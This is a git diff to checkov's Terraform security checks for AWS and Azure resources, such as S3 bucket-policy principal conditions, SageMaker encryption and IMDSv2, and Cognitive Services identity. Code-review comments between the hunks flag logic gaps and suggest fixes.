@@ -19,7 +19,7 @@ def scan_resource_conf(self, conf): :return: """ if "transit_encryption_enabled" in conf.keys() and conf["transit_encryption_enabled"][0] \ - and "auth_token" in conf.keys(): + and ("auth_token" in conf.keys() or "user_group_ids" in conf.keys()): return CheckResult.PASSED return CheckResult.FAILED diff --git a/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py b/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py index 0c0a03bc601..e1b7dbe45bd 100644 --- a/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py +++ b/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py @@ -35,16 +35,31 @@ def scan_resource_conf(self, conf: Dict[str, List[Any]]) -> CheckResult: self.evaluated_keys.append("ebs_block_device") blocks = conf.get("ebs_block_device") or [] - allblocks = root + blocks + all_blocks = root + blocks - if not allblocks: + if not all_blocks: return CheckResult.UNKNOWN + all_blocks_results = [] - for block in allblocks: - if isinstance(block, dict) and not block.get("encrypted") == [True]: - if not block.get("snapshot_id"): - return CheckResult.FAILED - return CheckResult.PASSED + for block in all_blocks: + all_blocks_results.append(_is_block_encrypted(block)) + if CheckResult.FAILED in all_blocks_results: + return CheckResult.FAILED + elif CheckResult.UNKNOWN in all_blocks_results: + return CheckResult.UNKNOWN + else: + return CheckResult.PASSED check = LaunchConfigurationEBSEncryption() + + +def _is_block_encrypted(block) -> CheckResult: + if isinstance(block, dict): + if block.get("encrypted") in ([False], False) and not block.get("snapshot_id"): + return CheckResult.FAILED + elif block.get("encrypted") in ([True], True): + return CheckResult.PASSED + elif not block.get("encrypted") in ([True], True) and block.get("snapshot_id"): + return CheckResult.PASSED + return CheckResult.UNKNOWN 
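Review bot: The new `"user_group_ids" in conf.keys()` clause tests only that the key exists, so a resource with an empty `user_group_ids` list still passes as if RBAC were configured; check the wrapped value instead, e.g. `conf.get("user_group_ids", [None])[0]`, and write both membership tests as `in conf` rather than `in conf.keys()`. The docstring above (partly outside this hunk) should state that either an auth token or RBAC user groups satisfies the check. scan_resource_conf begins outside the hunk.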
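Review bot: `_is_block_encrypted` returns UNKNOWN for a block that sets neither `encrypted` nor `snapshot_id`, whereas the removed loop returned FAILED for that case; since an omitted `encrypted` means an unencrypted volume unless account-level EBS default encryption is on, this quietly loosens the check. If the relaxation is intended, document it in the helper; otherwise treat a missing value like `False` in the first branch: `if block.get("encrypted") in (None, [False], False) and not block.get("snapshot_id"):`. Style points: `not block.get("encrypted") in (...)` reads as `block.get("encrypted") not in (...)`, the result list is a comprehension (`all_blocks_results = [_is_block_encrypted(b) for b in all_blocks]`), and the helper would normally sit above the `check = ...` instantiation with a `block: Any` annotation and a one-line docstring. scan_resource_conf starts outside the hunk.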
diff --git a/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py b/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py index ca04b2a8fe0..705f34e5f79 100644 --- a/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py +++ b/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py @@ -1,5 +1,5 @@ from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck -from checkov.common.models.enums import CheckCategories +from checkov.common.models.enums import CheckCategories, CheckResult class RDSInstancePerformanceInsights(BaseResourceValueCheck): @@ -10,6 +10,17 @@ def __init__(self) -> None: categories = (CheckCategories.LOGGING,) super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + def scan_resource_conf(self, conf): + # Performance Insights is not available for MariaDB and MySQL using certain classes: https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_PerfInsights.Overview.Engines.html + if conf.get("engine") in (["mariadb"], ["mysql"], ["aws_rds_cluster.default.engine"]): + if conf.get("instance_class") in (["db.t2.micro"], ["db.t2.small"], ["db.t3.micro"], ["db.t3.small"], + ["db.t4g.micro"], ["db.t4g.small"]): + return CheckResult.UNKNOWN + # Performance Insights is not supported for DB2: https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RDS_Fea_Regions_DB-eng.Feature.PerformanceInsights.html + if conf.get("engine") in (["db2-se"], ["db2-ae"]): + return CheckResult.UNKNOWN + return super().scan_resource_conf(conf) + def get_inspected_key(self) -> str: return 'performance_insights_enabled' diff --git a/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py b/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py index 0887adf6391..f47b0e30b51 100644 --- a/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py 
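Review bot: The engine tuple contains `["aws_rds_cluster.default.engine"]`, a literal unresolved reference to one specific resource name; it only matches a configuration that happens to use that exact name and looks like a test fixture that leaked into the check. Compare on the unwrapped values instead — `engine = conf.get("engine", [None])[0]` and `instance_class = conf.get("instance_class", [None])[0]` — and return UNKNOWN when `engine` is any unresolved reference rather than special-casing one. The override also lacks the `conf: dict[str, list[Any]]` / `-> CheckResult` annotations that the other new overrides in this commit carry.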
+++ b/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py @@ -25,10 +25,34 @@ def scan_resource_conf(self, conf: dict[str, list[Any]]) -> CheckResult: for idx_rule, rule in enumerate(rules): if rule.get("abort_incomplete_multipart_upload") and rule.get("status") == ["Enabled"]: self.evaluated_keys = [f"rule/[{idx_rule}]/abort_incomplete_multipart_upload"] - filter = rule.get("filter") - if filter and isinstance(filter, list) and filter[0]: - # it is possible to set an empty filter, which applies then to all objects - continue + filter_list = rule.get("filter") + if filter_list and isinstance(filter_list, list): + # if filter is empty then rule applies to all paths so we pass + found_non_empty_parameter = False + for filter_item in filter_list: + if isinstance(filter_item, dict): # check each filter parameter + connected = filter_item.get('and') + if connected and connected[0]: + filter_item = connected[0] + prefix = filter_item.get('prefix') + if prefix and prefix[0]: + found_non_empty_parameter = True + continue + object_size_greater_than = filter_item.get('object_size_greater_than') + if object_size_greater_than and object_size_greater_than[0]: + found_non_empty_parameter = True + continue + object_size_less_than = filter_item.get('object_size_less_than') + if object_size_less_than and object_size_less_than[0]: + found_non_empty_parameter = True + continue + tag = filter_item.get('tag') + if tag and tag[0]: + found_non_empty_parameter = True + continue + + if found_non_empty_parameter: # continue searching for rules + continue return CheckResult.PASSED diff --git a/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py b/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py index ae04de38b3a..46c3201687f 100644 --- a/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py +++ b/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py 
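Review bot: When a filter uses an `and` block the loop swaps `filter_item` for `connected[0]` but then only looks for `prefix`, `object_size_*` and `tag`; inside `and` the tag attribute is `tags` (a map), so a rule scoped with `filter { and { tags = {...} } }` is judged empty and accepted as applying to all objects. Add `tags = filter_item.get('tags')` to the inspected parameters, and guard the swap with `isinstance(connected[0], dict)` as the other hunks in this commit do for parser output. The four near-identical `if x and x[0]: found_non_empty_parameter = True; continue` blocks collapse to `found_non_empty_parameter = any(filter_item.get(k) and filter_item.get(k)[0] for k in ('prefix', 'object_size_greater_than', 'object_size_less_than', 'tag', 'tags'))`. scan_resource_conf begins outside the hunk.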
@@ -1,4 +1,5 @@
 from json import JSONDecodeError
+import re
 from checkov.common.models.enums import CheckResult, CheckCategories
 from checkov.terraform.checks.resource.base_resource_check import BaseResourceCheck
@@ -7,9 +8,59 @@ from typing import List +def check_conditions(statement) -> bool: + # Check if 'Condition' key exists + if 'Condition' not in statement: + return False + + condition = statement['Condition'] + + # Pass if they define bad ARNs. Assumes they are not too narrow + if any(key in condition for key in ['ArnNotEquals', 'ArnNotLike']): + return True + + # Handling 'ArnEquals' and 'ArnLike' + for arn_key in ['ArnEquals', 'ArnLike']: + if arn_key in condition: + # Pass unless it is for all IAM ARNs + for principal_key in ['aws:PrincipalArn', 'aws:SourceArn']: + if principal_key in condition[arn_key]: + principal_arn = condition[arn_key][principal_key] + # Fail if the Condition is for all ARNs of any resource + if re.match(r'^arn:aws:[a-z0-9-]+::\*.*$', principal_arn): + return False + # Passed if 'aws:PrincipalArn' or 'aws:SourceArn' do not match because then they are specific + return True + + # Leaves out the NOT conditions as too broad ('StringNotEquals', 'StringNotEqualsIgnoreCase', 'StringNotLike') + string_conditions = ['StringEquals', 'StringEqualsIgnoreCase', 'StringLike'] + if any(condition_type in condition for condition_type in string_conditions): + for condition_type in string_conditions: + if condition_type in condition: + # Purposefully not included: 'aws:SourceIp', 'aws:UserAgent', 'aws:Referer', 'aws:RequestTime', + # 'aws:SourceArn', 'aws:PrincipalType', 'aws:RequestTag', 'aws:SecureTransport', 'aws:SourceIp', + # 'aws:MultiFactorAuthPresent', 'aws:PrincipalType', all 'Properties of the request', + # all 'Properties of the resource', 'aws:PrincipalTag', 'aws:PrincipalIsAWSService', + # 'aws:PrincipalServiceName', 'aws:PrincipalServiceNamesList', 'aws:PrincipalType', 'aws:userid', + # 'aws:username' + if any(source in condition[condition_type] for source in ['aws:sourceVpce', 'aws:SourceVpc', + 'aws:PrincipalOrgPaths', 'aws:userid', + 'aws:PrincipalArn', + 'aws:PrincipalAccount', + 'aws:PrincipalOrgID', + 'aws:Ec2InstanceSourceVpc', + 
'ec2:SourceInstanceArn', + 'lambda:SourceFunctionArn', + 'ssm:SourceInstanceArn']): + return True + + # Default fail if none of the above conditions are met + return False + + class S3AllowsAnyPrincipal(BaseResourceCheck): - def __init__(self): + def __init__(self) -> None: name = "Ensure S3 bucket does not allow an action with any Principal" id = "CKV_AWS_70" supported_resources = ['aws_s3_bucket', 'aws_s3_bucket_policy'] @@ -36,13 +87,16 @@ def scan_resource_conf(self, conf): continue principal = statement['Principal'] if principal == '*': + if check_conditions(statement): + return CheckResult.PASSED return CheckResult.FAILED if 'AWS' in statement['Principal']: # Can be a string or an array of strings aws = statement['Principal']['AWS'] if (isinstance(aws, str) and aws == '*') or (isinstance(aws, list) and '*' in aws): + if check_conditions(statement): + return CheckResult.PASSED return CheckResult.FAILED - return CheckResult.PASSED def get_evaluated_keys(self) -> List[str]: diff --git a/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py b/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py index 7908da3a9de..923b797dbca 100644 --- a/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py +++ b/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py @@ -14,7 +14,7 @@ def __init__(self) -> None: def scan_resource_conf(self, conf: Dict[str, List[Any]]) -> CheckResult: lock_conf = conf.get("object_lock_configuration") - if lock_conf and lock_conf[0]: + if lock_conf and lock_conf[0] and isinstance(lock_conf[0], dict): lock_enabled = lock_conf[0].get("object_lock_enabled") if lock_enabled in ["Enabled", ["Enabled"]]: return CheckResult.PASSED diff --git a/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py b/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py index 2dc4d13d164..21cd4aff5ff 100644 --- a/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py 
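Review bot: `principal_arn = condition[arn_key][principal_key]` goes straight into `re.match`, but IAM condition values may be a list of strings, in which case the check raises TypeError instead of returning a verdict; normalise to a list first (see below). The same pattern hardcodes the `aws` partition and does not treat a bare `*` as open, so a value such as `*` or `arn:aws-us-gov:iam::*:root` makes check_conditions return True and the `Principal: "*"` statement is reported PASSED. The string-condition branch likewise tests key presence only, so `"StringLike": {"aws:PrincipalArn": "*"}` passes as well, the list spells `aws:sourceVpce` in a casing policies rarely use (IAM keys are case-insensitive, a dict `in` test is not), and the comment says `aws:userid` is purposefully excluded although it is in the list. Returning True for `ArnNotEquals`/`ArnNotLike` also passes a policy that grants everyone except a few named ARNs, which is still effectively public; False (or surfacing UNKNOWN from the caller) is the safer default. A docstring should state the contract: True only when the statement's Condition restricts the wildcard principal to a specific caller set.
```python
def check_conditions(statement) -> bool:
    # … unchanged: 'Condition' presence check …
    for arn_key in ['ArnEquals', 'ArnLike']:
        if arn_key in condition:
            for principal_key in ['aws:PrincipalArn', 'aws:SourceArn']:
                if principal_key in condition[arn_key]:
                    values = condition[arn_key][principal_key]
                    if isinstance(values, str):
                        values = [values]
                    # a bare wildcard or an account-wildcard ARN in any partition is still "any principal"
                    if any(v == '*' or re.match(r'^arn:[^:]*:[a-z0-9-]+::\*.*$', v) for v in values):
                        return False
            return True
    # … unchanged: string-condition handling …
```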
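Review bot: `return CheckResult.PASSED` inside the `for` loop ends the scan at the first wildcard statement whose Condition is acceptable, so a later statement in the same policy with `Principal: "*"` and no Condition is never examined and the bucket is reported PASSED. Use `continue` in both new branches instead of returning, and let the trailing `return CheckResult.PASSED` after the loop decide once every statement has been checked. scan_resource_conf starts outside the hunk.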
+++ b/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py @@ -1,6 +1,6 @@ from typing import Any -from checkov.common.models.enums import CheckCategories +from checkov.common.models.enums import CheckCategories, CheckResult from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck from checkov.common.models.consts import ANY_VALUE @@ -13,6 +13,11 @@ def __init__(self) -> None: categories = (CheckCategories.ENCRYPTION,) super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + def scan_resource_conf(self, conf): + if conf.get("type")[0] != "SecureString": + return CheckResult.PASSED + return super().scan_resource_conf(conf) + def get_inspected_key(self) -> str: return "key_id" diff --git a/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py b/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py new file mode 100644 index 00000000000..05e714b76ba --- /dev/null +++ b/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py @@ -0,0 +1,21 @@ +from checkov.common.models.consts import ANY_VALUE +from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.enums import CheckCategories + + +class SagemakerDataQualityJobDefinitionEncryption(BaseResourceValueCheck): + def __init__(self): + name = "Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt model artifacts" + id = "CKV_AWS_367" + supported_resources = ['aws_sagemaker_data_quality_job_definition'] + categories = [CheckCategories.ENCRYPTION] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self): + return "data_quality_job_output_config/[0]/kms_key_id" + + def get_expected_value(self): + return ANY_VALUE + + +check = SagemakerDataQualityJobDefinitionEncryption() 
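Review bot: `conf.get("type")[0]` raises TypeError when `type` is absent from the block or not list-wrapped by the parser; read it defensively, `param_type = conf.get("type")` followed by `if isinstance(param_type, list) and param_type and param_type[0] != "SecureString": return CheckResult.PASSED`, so a missing type falls through to the base check rather than crashing the scan. Annotate the override like the others in this commit (`conf: dict[str, list[Any]]) -> CheckResult`) and add `# key_id is only meaningful for SecureString; String/StringList are never KMS-encrypted` so the early PASSED is not read as a gap.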
diff --git a/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py b/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py new file mode 100644 index 00000000000..7bd22d9ef5d --- /dev/null +++ b/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py @@ -0,0 +1,17 @@ +from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.enums import CheckCategories + + +class SagemakerDataQualityJobDefinitionTrafficEncryption(BaseResourceValueCheck): + def __init__(self): + name = "Ensure Amazon Sagemaker Data Quality Job encrypts all communications between instances used for monitoring jobs" + id = "CKV_AWS_369" + supported_resources = ['aws_sagemaker_data_quality_job_definition'] + categories = [CheckCategories.ENCRYPTION] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self): + return "network_config/[0]/enable_inter_container_traffic_encryption" + + +check = SagemakerDataQualityJobDefinitionTrafficEncryption() diff --git a/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py b/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py new file mode 100644 index 00000000000..70539e19156 --- /dev/null +++ b/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py 
@@ -0,0 +1,21 @@ +from checkov.common.models.consts import ANY_VALUE +from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.enums import CheckCategories + + +class SagemakerDataQualityJobDefinitionVolumeEncryption(BaseResourceValueCheck): + def __init__(self): + name = "Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt data on attached storage volume" + id = "CKV_AWS_368" + supported_resources = ['aws_sagemaker_data_quality_job_definition'] + categories = [CheckCategories.ENCRYPTION] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self): + return "job_resources/[0]/cluster_config/[0]/volume_kms_key_id" + + def get_expected_value(self): + return ANY_VALUE + + +check = SagemakerDataQualityJobDefinitionVolumeEncryption() diff --git a/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py b/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py index 70b6d7f5980..a73419f486f 100644 --- a/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py +++ b/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py @@ -5,9 +5,9 @@ class SagemakerDomainEncryptedWithCMK(BaseResourceValueCheck): def __init__(self): - name = "Ensure Sagemaker domain is encrypted by KMS using a customer managed Key (CMK)" + name = "Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK)" id = "CKV_AWS_187" - supported_resources = ['aws_sagemaker_domain'] + supported_resources = ['aws_sagemaker_domain', 'aws_sagemaker_notebook_instance'] categories = [CheckCategories.ENCRYPTION] super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) 
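Review bot: Adding `aws_sagemaker_notebook_instance` to supported_resources reuses the key returned by get_inspected_key, which is outside this hunk; confirm that attribute exists on both resource types, otherwise every notebook instance will fail with a missing-attribute result regardless of its KMS setting. A comment on the supported_resources line naming the shared attribute would document that assumption.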
diff --git a/checkov/terraform/checks/resource/aws/SagemakerFlowDefinitionUsesKMS.py b/checkov/terraform/checks/resource/aws/SagemakerFlowDefinitionUsesKMS.py new file mode 100644 index 00000000000..57726c8b7c4 --- /dev/null +++ b/checkov/terraform/checks/resource/aws/SagemakerFlowDefinitionUsesKMS.py @@ -0,0 +1,21 @@ +from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.enums import CheckCategories +from checkov.common.models.consts import ANY_VALUE + + +class SagemakerFlowDefinitionUsesKMS(BaseResourceValueCheck): + def __init__(self): + name = "Ensure Amazon SageMaker Flow Definition uses KMS for output configurations" + id = "CKV_AWS_372" + supported_resources = ['aws_sagemaker_flow_definition'] + categories = [CheckCategories.ENCRYPTION] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self): + return "output_config/[0]/kms_key_id" + + def get_expected_value(self): + return ANY_VALUE + + +check = SagemakerFlowDefinitionUsesKMS() diff --git a/checkov/terraform/checks/resource/aws/SagemakerModelWithNetworkIsolation.py b/checkov/terraform/checks/resource/aws/SagemakerModelWithNetworkIsolation.py new file mode 100644 index 00000000000..313f2c50163 --- /dev/null +++ b/checkov/terraform/checks/resource/aws/SagemakerModelWithNetworkIsolation.py 
@@ -0,0 +1,17 @@ +from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.enums import CheckCategories + + +class SagemakerModelWithNetworkIsolation(BaseResourceValueCheck): + def __init__(self): + name = "Ensure Amazon SageMaker model uses network isolation" + id = "CKV_AWS_370" + supported_resources = ['aws_sagemaker_model'] + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self): + return "enable_network_isolation" + + +check = SagemakerModelWithNetworkIsolation() diff --git a/checkov/terraform/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py b/checkov/terraform/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py new file mode 100644 index 00000000000..d02840506d5 --- /dev/null +++ b/checkov/terraform/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py @@ -0,0 +1,20 @@ +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck + + +class SagemakerNotebookInstanceAllowsIMDSv2(BaseResourceValueCheck): + def __init__(self): + name = "Ensure Amazon SageMaker Notebook Instance only allows for IMDSv2" + id = "CKV_AWS_371" + supported_resources = ['aws_sagemaker_notebook_instance'] + categories = [CheckCategories.ENCRYPTION] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self): + return 'instance_metadata_service_configuration/[0]/minimum_instance_metadata_service_version' + + def get_expected_value(self): + return "2" + + +check = SagemakerNotebookInstanceAllowsIMDSv2() diff --git a/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py b/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py index 198346ac221..34c90a8923f 100644 
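Review bot: SagemakerNotebookInstanceAllowsIMDSv2 files an IMDSv2-enforcement check under `CheckCategories.ENCRYPTION`; nothing in it concerns encryption, and `CheckCategories.GENERAL_SECURITY` (used by the Azure checks in this commit) describes metadata-service hardening better. The class name `...AllowsIMDSv2` also inverts the intent stated in `name` (v2 only); `...RequiresIMDSv2` would match. A comment such as `# minimum_instance_metadata_service_version is a string attribute, hence "2" not 2` would stop a future reader from "fixing" the expected value to an int.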
--- a/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py +++ b/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py @@ -4,7 +4,7 @@ class SecurityGroupRuleDescription(BaseResourceCheck): def __init__(self): - name = "Ensure every security groups rule has a description" + name = "Ensure every security group and rule has a description" id = "CKV_AWS_23" supported_resource = [ 'aws_security_group', diff --git a/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py b/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py index 7056f916518..fb79f419378 100644 --- a/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py +++ b/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py @@ -21,7 +21,7 @@ def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult: statement = rule.get("statement") if statement: self.evaluated_keys = [f"rule/[{idx_rule}]/statement/[0]/managed_rule_group_statement"] - if not isinstance(statement, list): + if not isinstance(statement, list) or not isinstance(statement[0], dict): return CheckResult.UNKNOWN managed_group = statement[0].get("managed_rule_group_statement") if managed_group: diff --git a/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py b/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py index 7e97c5dd4c5..a25460c806a 100644 --- a/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py +++ b/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py @@ -36,6 +36,8 @@ def scan_resource_conf(self, conf: dict[str, list[Any]]) -> CheckResult: statements = rule.get('statement') if statements and isinstance(statements, list): for statement in statements: + if not isinstance(statement, dict): + continue if statement.get('managed_rule_group_statement'): passing = True 
diff --git a/checkov/terraform/checks/resource/azure/ACRDedicatedDataEndpointEnabled.py b/checkov/terraform/checks/resource/azure/ACRDedicatedDataEndpointEnabled.py new file mode 100644 index 00000000000..b5b92b497d2 --- /dev/null +++ b/checkov/terraform/checks/resource/azure/ACRDedicatedDataEndpointEnabled.py @@ -0,0 +1,17 @@ +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck + + +class ACRDedicatedDataEndpointEnabled(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure dedicated data endpoints are enabled." + id = "CKV_AZURE_237" + supported_resources = ("azurerm_container_registry",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "data_endpoint_enabled" + + +check = ACRDedicatedDataEndpointEnabled() diff --git a/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py b/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py index d3d86d41151..2249f55ac5b 100644 --- a/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py +++ b/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py @@ -21,14 +21,14 @@ def scan_resource_conf(self, conf) -> CheckResult: if site_config.get('application_stack') and isinstance(site_config.get('application_stack'), list): stack = site_config.get('application_stack')[0] if stack.get('dotnet_version') and isinstance(stack.get('dotnet_version'), list): - if stack.get('dotnet_version')[0] == "v7.0": + if stack.get('dotnet_version')[0] == "v8.0": return CheckResult.PASSED return CheckResult.FAILED return CheckResult.UNKNOWN def get_expected_values(self) -> List[str]: - return ["v6.0", "v7.0"] + return ["v6.0", "v8.0"] check = AppServiceDotnetFrameworkVersion() 
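Review bot: After this change scan_resource_conf passes only `"v8.0"` while get_expected_values still reports `["v6.0", "v8.0"]`, so a `v6.0` stack is FAILED with an expected-values hint that says v6.0 is acceptable. Either drop `"v6.0"` from get_expected_values or compare against it in the scan so the two cannot drift again: `if stack.get('dotnet_version')[0] in self.get_expected_values():`. In the ACR hunk above, `name` ends with a period unlike every other check name in this commit — drop it for consistency.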
diff --git a/checkov/terraform/checks/resource/azure/AzureSparkPoolIsolatedComputeEnabled.py b/checkov/terraform/checks/resource/azure/AzureSparkPoolIsolatedComputeEnabled.py new file mode 100644 index 00000000000..ffead4481e7 --- /dev/null +++ b/checkov/terraform/checks/resource/azure/AzureSparkPoolIsolatedComputeEnabled.py @@ -0,0 +1,17 @@ +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck + + +class AzureSparkPoolIsolatedComputeEnabled(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure isolated compute is enabled for Synapse Spark pools" + id = "CKV_AZURE_242" + supported_resources = ("azurerm_synapse_spark_pool",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "compute_isolation_enabled" + + +check = AzureSparkPoolIsolatedComputeEnabled() diff --git a/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py b/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py new file mode 100644 index 00000000000..3128d231ab7 --- /dev/null +++ b/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py 
@@ -0,0 +1,21 @@ +from checkov.common.models.consts import ANY_VALUE +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck + + +class CognitiveServicesDisablesPublicNetwork(BaseResourceValueCheck): + def __init__(self): + name = "Ensure that all Azure Cognitive Services accounts are configured with a managed identity" + id = "CKV_AZURE_238" + supported_resources = ['azurerm_cognitive_account'] + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self): + return "identity/[0]/type" + + def get_expected_value(self): + return ANY_VALUE + + +check = CognitiveServicesDisablesPublicNetwork() diff --git a/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py b/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py new file mode 100644 index 00000000000..4ffef689769 --- /dev/null +++ b/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py @@ -0,0 +1,25 @@ +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck + + +class CognitiveServicesEnableLocalAuth(BaseResourceValueCheck): + def __init__(self): + name = "Ensure that Cognitive Services accounts disable local authentication" + id = "CKV_AZURE_236" + supported_resources = ('azurerm_cognitive_account', ) + categories = (CheckCategories.NETWORKING, ) + super().__init__( + name=name, + id=id, + categories=categories, + supported_resources=supported_resources, + ) + + def get_inspected_key(self): + return 'local_auth_enabled' + + def get_expected_value(self): + return False + + +check = CognitiveServicesEnableLocalAuth() 
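Review bot: CognitiveServicesConfigureIdentity.py defines `CognitiveServicesDisablesPublicNetwork`, a name copied from another check that does not describe the managed-identity requirement, and both this file and CognitiveServicesEnableLocalAuth.py put identity/authentication checks under `CheckCategories.NETWORKING`; rename the class in both the `class` line and `check = ...` to `CognitiveServicesConfigureIdentity`, and use `CheckCategories.IAM`, which this commit already uses for the Cognito check. `CognitiveServicesEnableLocalAuth` as a class name also reads as the opposite of what the check enforces (local auth disabled); `CognitiveServicesDisableLocalAuth` would match its `name` string. Both checks rely on the base class's verdict for a missing attribute, so a one-line comment on each stating the provider default they assume would help.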
